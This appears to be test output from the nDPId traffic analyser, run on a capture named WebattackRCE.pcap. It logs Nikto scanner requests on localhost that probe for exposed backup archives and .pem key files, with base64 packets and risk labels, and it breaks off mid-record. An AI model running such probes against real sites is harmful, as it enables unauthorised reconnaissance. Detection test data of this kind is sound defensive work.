-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276891,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/ZdAAEAGPpl\/AAABfwAAAcKmH5DYD8XTrc+7CoAYAED+uQAAAQEICp1m+8OdZvvDR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276891,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276893,"pkt":"AAAAAAAAAAAAAAAACABFAADFI6xAAEAGGIV\/AAABfwAAAcKoH5Ar0hvuzfCq7oAYAED+uQAAAQEICp1m+8WdZvvFR0VUIC8xMjcuMC4wLjEudGFyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276893,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276894,"pkt":"AAAAAAAAAAAAAAAACABFAADDA5ZAAEAGOJ1\/AAABfwAAAcKqH5B\/mzvUPuYs44AYAED+twAAAQEICp1m+8adZvvGR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276894,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276896,"pkt":"AAAAAAAAAAAAAAAACABFAADD\/SZAAEAGPwx\/AAABfwAAAcKsH5AB18VtW5jVeIAYAED+twAAAQEICp1m+8idZvvIR0VUIC8xMjcudGFyLmJ6MiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276896,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276897,"pkt":"AAAAAAAAAAAAAAAACABFAADFBrJAAEAGNX9\/AAABfwAAAcKuH5Ayaz75EQ6Mk4AYAED+uQAAAQEICp1m+8mdZvvJR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276897,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276900,"pkt":"AAAAAAAAAAAAAAAACABFAADFczBAAEAGyQB\/AAABfwAAAcKwH5A3G0tor3ywHoAYAED+uQAAAQEICp1m+8ydZvvMR0VUIC8xMjcuMC50YXIuYnoyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276900,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276901,"pkt":"AAAAAAAAAAAAAAAACABFAADD0l1AAEAGadV\/AAABfwAAAcKyH5CdU+oT47LjtYAYAED+twAAAQEICp1m+82dZvvNR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276901,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276903,"pkt":"AAAAAAAAAAAAAAAACABFAADDR55AAEAG9JR\/AAABfwAAAcK0H5AcfX\/WOy6jEYAYAED+twAAAQEICp1m+8+dZvvOR0VUIC9zaXRlLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 